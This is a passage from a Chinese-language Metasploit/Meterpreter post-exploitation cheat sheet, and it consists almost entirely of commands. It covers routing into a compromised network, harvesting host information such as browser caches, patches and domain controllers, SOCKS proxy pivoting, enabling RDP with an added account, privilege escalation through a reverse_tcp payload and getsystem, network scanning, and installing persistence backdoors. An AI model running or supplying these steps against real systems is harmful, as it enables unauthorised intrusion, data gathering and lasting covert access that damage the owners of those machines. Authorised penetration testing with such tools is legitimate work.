=====================meterpreter操作======================
0x08autoroute添加路由:
run autoroute –h #查看帮助
run autoroute -s192.168.159.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
=====================meterpreter操作======================
0x09信息收集脚本命令:
run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run post/windows/gather/enum_ie #获取IE缓存
run post/windows/gather/enum_chrome #获取Chrome缓存
run post/windows/gather/enum_patches #补丁信息
run post/windows/gather/enum_domain #查找域控
=====================meterpreter操作======================
0x10MSF新增Socks代理节点命令:
use auxiliary/server/socks_proxy
set SRVHOST 192.168.238.128
set SRVPORT 6677set username username
set password password
run
然后vi /etc/proxychains.conf #添加 socks5 192.168.238.128 6677 username password
最后proxychains 使用Socks代理访问
补充:可以使用其他的socks代理服务器进行代理
只需vi /etc/proxychains4.conf
添加:socks5 服务器ip地址 端口号 账号 密码
proxychains4 firefox即可使用代理访问
=====================meterpreter操作======================
0x11开启远程RDP命令:
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456#添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662#将3389端口转发到6662
=====================meterpreter操作======================
0x12提权命令:
use exploit/windows/local/ask
set session 1set payload windows/meterpreter/reverse_tcp
run
getsystem获取system权限
=====================meterpreter操作======================
0x13端口扫描命令:
run post/windows/gather/arp_scanner rhosts=192.168.238.0/24
run auxiliary/scanner/portscan/tcp rhosts=192.168.3.13 ports=3389
=====================meterpreter操作======================
0x15persistence启动项后门/metsvc服务命令:
use exploit/windows/local/persistence
set session 1
run
use exploit/windows/local/persistence_service
set session 1
run
在meterpreter里执行:
run metsvc